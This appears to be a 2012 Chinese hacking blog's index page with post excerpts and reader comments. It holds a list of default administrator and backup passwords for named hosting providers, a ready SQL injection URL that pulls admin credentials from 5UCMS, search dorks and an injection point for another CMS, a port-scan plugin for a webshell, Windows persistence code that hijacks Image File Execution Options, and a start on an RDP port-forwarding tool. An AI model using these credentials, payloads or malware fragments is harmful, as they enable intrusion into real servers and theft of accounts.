0℃
2012年05月21日
为了避免别人扫描远程桌面连接端口,保障服务器的安全,我们可以修改一下3389端口。
总共有两个步骤:一是修改服务器端的端口设置;二是客户端连接方法。方法如下(以Windows Server 2003为例,其它系统仅供参考):
一、修改服务器端的端口设置(注册表有2处需要修改)
1、第一处:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,选择十进制,改成你所希望的端口(范围在1024到65535,而且不能冲突),比如6000
2、第二处:
[HKEY_LOCAL_...
阅读全文
0℃
2012年05月11日
万天备分系统 账户是WT_admin 密码 19885510 GHOST密码 wtidc@))(
天下技术备分系统 administrator xyidc_2006
中亿网维 administrator 95217189 95217 ghost密码95217
亿迅备分系统 cceii chinayixun ghost 密码也是 chinayixun
华晨 Administrator GHOST :huachen1258zz 密码huachen1258zz
三合(3h8) administrator zhangzhao sanhe123 密码3H8IDC!!#或者3H8IDC72sanhe000 xiaoyili sanhe000~!@# 3H8IDC!!#
比天数据机房 root 123654 3IIS 3IIS 1008 1008 administrator 95313\ ghost密码95313
数据先锋网维...
阅读全文
0℃
2012年05月11日
By:nowake
中国菜刀的两个小插件(asp),扫描常用端口,读取终端端口(3389、Mstsc)。
扫描常用端口:
ip="127.0.0.1"
port="21,23,80,3306,1433,3389,43958"
arrport=Split(port,",")
For i=0 To Ubound(arrport)
If Isnumeric(arrport(i)) Then
Call Scan(ip, arrport(i))
end if
next
Sub Scan(scanip,theport)
on error resume next
set conn=server.createobject("Adodb.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & scanip & "," & theport & ";User ID=yezi;Pass...
阅读全文
0℃
2012年05月11日
2011年12月21日上午,有黑客在网上公开了中国最大的开发者社区CSDN网站的用户数据库,600余万个注册邮箱账号和与之对应的明文密码泄 露;12月22日,网上接着曝出人人网、天涯、开心网、多玩、世纪佳缘、珍爱网、美空网、百合网、178、7K7K等知名网站的用户账号密码遭公开泄露
堪称中国互联网史上最大规模的用户信息泄密事件,再次让大家对黑客以及其背后的隐秘的产业链产生了浓厚的兴趣。以下为一个黑客的口述。
口述/前黑客B先生
整理/本刊记者 辛建军
编辑/卢旭成(微博)
盘下一家肯德基的“教主”
那个靠做黑色...
阅读全文
0℃
2012年05月11日
作者:Liuker
信息来源:(SYSCIC TEAM Http://www.syscic.com)
先说下 这个洞洞不是代码审计来的 是今天在日某站的是 C 段一个站
无意发现的
关键字:Powered by 咿呀咿呀淘客家族
关键字:inurl:announce.php?announceid=4(疯子补充)
注入点
http://www.XXXX.com/show.php?id=10 ID是任意的
默认后台
http://www.XXXX.com.cn/admin/admin_login.php
至于怎么拿shell 还没看
刚发现就发上来了
来几张图
阅读全文
0℃
2012年05月11日
无忧(5UCMS)后台地址:admin/Login.asp
数据库默认路径:inc/db 目录下
漏洞地址:
admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin
获取后台账号和密码
阅读全文
0℃
2012年05月10日
记得是从中华吸血鬼里面提取出来的。劫持FSO 代码
void jiechi()
{
//// create Image File Execution Options 项
char mudi[]="C:\\WINDOWS\\system32\\ctfmon.exe";
HKEY hCompanyKey = NULL;
CString jiechi,zichuan;
int index=0,length=0;;
HKEY hSoftKey;
HKEY hPlaceKey; //
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"), 0, KEY_WRITE|KEY_READ,
...
阅读全文
0℃
2012年05月10日
想想还应该加入点什么
不过高的太复杂了也不好
稍微修改下,直接无界面把内网的3389转发出来就OK
/////////////////////////////////////////////////////////////////////////////////////////////////
#include <stdio .h>
#include <winsock2 .h>
#include <stdlib .h>
#pragma comment(lib,"Ws2_32")
HANDLE hevent;
typedef struct _s1ands2
{
SOCKET s1;
SOCKET s2;
} s1ands2;
typedef struct _info{
int listenorslave; //1...
阅读全文
没想到我这离开技术圈的第一篇
好牛B的样子...但是有压力
:oops: 是做广告外挂站
:oops: 对我没多大用处
博主很牛x
运行提示才出错。。难道我用错
太变态了。。。
博主太有才了